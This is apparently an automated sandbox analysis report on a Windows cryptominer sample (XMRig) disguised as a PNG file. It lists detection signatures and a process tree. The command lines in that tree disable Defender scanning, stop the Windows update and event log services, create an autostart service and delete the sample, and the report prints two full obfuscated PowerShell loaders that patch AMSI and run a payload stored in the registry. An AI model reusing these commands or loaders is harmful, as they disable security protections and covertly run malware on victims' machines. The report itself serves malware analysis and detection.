Windows Analysis Report
0Ty.png.exe

Overview

General Information

Sample name: 0Ty.png.exe
Analysis ID: 1580691
MD5: 3cae1f11044d2ca787824610a40f1696
SHA1: bf4af642f36e87b887f973f47a46bcb2e656c636
SHA256: 50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251
Tags: exe, user-Jame

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Suricata IDS alerts for network traffic
Yara detected Xmrig cryptocurrency miner
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Self deletion via cmd or bat file
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • 0Ty.png.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\0Ty.png.exe" MD5: 3CAE1F11044D2CA787824610A40F1696)
    • powershell.exe (PID: 7428 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7656 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7740 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 7664 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7756 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7808 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7856 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7904 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7952 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7960 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7976 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7992 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 8008 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • sc.exe (PID: 8048 cmdline: C:\Windows\system32\sc.exe delete "HGLZSDMZ" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8176 cmdline: C:\Windows\system32\sc.exe create "HGLZSDMZ" binpath= "C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3704 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5356 cmdline: C:\Windows\system32\sc.exe start "HGLZSDMZ" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4076 cmdline: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\0Ty.png.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 7312 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
    • dllhost.exe (PID: 8008 cmdline: C:\Windows\System32\dllhost.exe /Processid:{cf3d95db-0758-4a82-bfdc-72f769e75e83} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
        • dllhost.exe (PID: 3228 cmdline: C:\Windows\System32\dllhost.exe /Processid:{0efb55d5-e8e1-4bc9-b3c4-28c83a2f4e5a} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
          • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
  • powershell.exe (PID: 8168 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CKtjhrwjgtVV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OBERloAcZJvOcu,[Parameter(Position=1)][Type]$NRdDEuXiTK)$iAHAMhduySN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'mor'+[Char](121)+''+[Char](77)+''+'o'+'dul'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+''+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c,'+[Char](83)+'e'+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsiC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+'Cla'+'s'+''+'s'+'',[MulticastDelegate]);$iAHAMhduySN.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OBERloAcZJvOcu).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$iAHAMhduySN.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+'ub'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[C
har](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+[Char](108)+'',$NRdDEuXiTK,$OBERloAcZJvOcu).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+','+''+[Char](77)+'anag'+'e'+''+'d'+'');Write-Output $iAHAMhduySN.CreateType();}$qragMIYqXnsdW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'os'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+''+'i'+'n3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+'f'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+'ho'+[Char](100)+''+'s'+'');$OvDFGAtJneNnnn=$qragMIYqXnsdW.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+'S'+'ta'+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JUWLrRiAryQvoCLvYRG=CKtjhrwjgtVV @([String])([IntPtr]);$QPnZYyCGLlinWBcTXIFRjN=CKtjhrwjgtVV 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$nOTpineWwNN=$qragMIYqXnsdW.GetMethod(''+[Char](71)+'et'+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+'l'+'e'+'H'+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+'n'+''+'e'+''+[Char](108)+'32'+'.'+''+[Char](100)+''+[Char](108)+'l')));$GwiYeAsQvQLFBf=$OvDFGAtJneNnnn.Invoke($Null,@([Object]$nOTpineWwNN,[Object](''+'L'+''+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$crErzkRECYPPqZhPE=$OvDFGAtJneNnnn.Invoke($Null,@([Object]$nOTpineWwNN,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+'a'+'l'+[Char](80)+''+[Char](114)+'o'+'t'+''+'e'+''+[Char](99)+''+[Char](116)+'')));$XcrjNVu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GwiYeAsQvQLFBf,$JUWLrRiAryQvoCLvYRG).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$GgrwIxrHHMksBSkCM=$OvDFGAtJneNnnn.Invoke($Null,@([Object]$XcrjNVu,[Object](''+'A'+''+'m'+''+'s'+''+[Char](105)+''+[Char](83)+''+'c'+''+'a'+''+[Char](110)+''+'B'+'u'+'f'+'f'+'e'+''+[Char](114)+'')));$mtiMskcCMz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($crErzkRECYPPqZhPE,$QPnZYyCGLlinWBcTXIFRjN).Invoke($GgrwIxrHHMksBSkCM,[uint32]8,4,[ref]$mtiMskcCMz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GgrwIxrHHMksBSkCM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($crErzkRECYPPqZhPE,$QPnZYyCGLlinWBcTXIFRjN).Invoke($GgrwIxrHHMksBSkCM,[uint32]8,0x20,[ref]$mtiMskcCMz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+'A'+'R'+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+'le'+[Char](114)+''+'s'+''+[Char](116)+'a'+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Nul
l)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • weiuemyrzjra.exe (PID: 4280 cmdline: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe MD5: 3CAE1F11044D2CA787824610A40F1696)
    • powershell.exe (PID: 2308 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7648 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7708 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 7556 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7700 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7656 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7800 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7812 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7860 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7896 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7884 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7916 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7936 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 8136 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 8052 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • powershell.exe (PID: 7956 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DwpcGqRaxEQb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kwrQxTwRDzvgHI,[Parameter(Position=1)][Type]$doUOZqbWki)$ZycFOOCRuuH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+'M'+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+'ga'+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+'lass',[MulticastDelegate]);$ZycFOOCRuuH.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+'e'+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+'i'+'d'+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+'nt'+'i'+'m'+[Char](101)+','+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$ZycFOOCRuuH.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'H'+[Ch
ar](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+'Sig'+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$doUOZqbWki,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $ZycFOOCRuuH.CreateType();}$PIBnzpATGOiSb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+[Char](109)+''+[Char](46)+'d'+'l'+'l')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+'o'+'s'+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+'.'+'Uns'+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+'t'+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+'d'+'s');$BXLsZikXLBwiCU=$PIBnzpATGOiSb.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+'Ad'+[Char](100)+'res'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,St'+[Char](97)+'ti'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PODdpwJbLVAeqmqHxFL=DwpcGqRaxEQb @([String])([IntPtr]);$yBpeaDKUEGooqcDLMYJxLn=DwpcGqRaxEQb 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ckLkUNcHalt=$PIBnzpATGOiSb.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+'o'+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'H'+'a'+''+[Char](110)+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+'2'+''+[Char](46)+'dll')));$gtTuUeciWixJxL=$BXLsZikXLBwiCU.Invoke($Null,@([Object]$ckLkUNcHalt,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+'Li'+[Char](98)+'r'+[Char](97)+'ryA')));$XRPINnzEnujTAspan=$BXLsZikXLBwiCU.Invoke($Null,@([Object]$ckLkUNcHalt,[Object](''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+'e'+''+'c'+''+'t'+'')));$DBzwtCM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gtTuUeciWixJxL,$PODdpwJbLVAeqmqHxFL).Invoke(''+[Char](97)+''+[Char](109)+'si'+'.'+''+[Char](100)+'ll');$DyCMYouZARyvvTbwm=$BXLsZikXLBwiCU.Invoke($Null,@([Object]$DBzwtCM,[Object](''+'A'+''+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+[Char](99)+'a'+'n'+'B'+'u'+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$GgVQgYCQUN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XRPINnzEnujTAspan,$yBpeaDKUEGooqcDLMYJxLn).Invoke($DyCMYouZARyvvTbwm,[uint32]8,4,[ref]$GgVQgYCQUN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DyCMYouZARyvvTbwm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XRPINnzEnujTAspan,$yBpeaDKUEGooqcDLMYJxLn).Invoke($DyCMYouZARyvvTbwm,[uint32]8,0x20,[ref]$GgVQgYCQUN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+''+'i'+''+'a'+''+'l'+''+'e'+''+'r'+''+[Char](115)+''+'t'+''+'a'+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: xmrig
